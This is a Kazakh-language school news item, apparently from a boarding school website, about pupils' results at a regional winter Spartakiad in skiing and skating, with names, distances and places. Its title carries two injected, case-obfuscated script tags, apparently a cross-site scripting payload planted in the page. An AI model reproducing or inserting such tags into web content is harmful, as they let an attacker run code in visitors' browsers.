Шаңғы жарысы, коньки тебу спорты бойынша облыстық қысқы арнайы Спартакиада.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.02.2020

10-12 ақпан аралығында Көкшетау қаласында шаңғы жарысы және коньки тебу спорты бойынша облыстық қысқы арнайы Спартакиада өтті.

Жарысқа әр түрлі деңгейдегі және қабілетті спортшылар қатысты. "Атбасар қаласының № 2 арнайы мектеп-интернаты" командасын 7 оқушы таныстырды: Скинин Иван, Атымтаев Рустам, Лысенко Андрей, Наб Виктор, Шайхутдинова Екатерина, Шартнер Алина, Уали Максут – жаттықтырушы Сахнов Юрий Владимирович.

Жалпы нәтижесінде: 200 м және 500 м қашықтықта шаңғы жарысы бойынша Рустам Атымтаев бірінші орынға ие болды, Иван Скинин 1000 м, 500 м қашықтықта үшінші орынға ие болды, Андрей Лысенко 50 м және 100 м қашықтықта бірінші орынға ие болды, Виктор Наб 50 м және 100 м қашықтықта екінші орынға ие болды.

Біздің қыздар жақсы нәтиже көрсетті, 300 м қашықтықта Шайхутдинова Екатерина бірінші орынды, 500 м қашықтықта екінші орынды, Шартнер Алина 300 м қашықтықта екінші орынды, 500 м қашықтықта төртінші орынды иеленді.

Конькимен жүгіру спорты бойынша Уали Максут 500 м қашықтықта үшінші орынға ие болды.

Шаңғы жарысынан 4х500 м эстафетасында Атымтаев Рустам, Шайхутдинова Екатерина, Скинин Иван, Шартнер Алина жалпы командалық екінші орынға ие болды.

Құттықтаймыз! Барлық спортшылар грамоталармен, дипломдармен және медальдармен марапатталды.

Балаларға спортта үлкен табыс тілейміз!

Дайындаған: Сахнов Ю. В.

Просмотров: 334


Пікір қосу



Деректерді қолтаңбаға қосу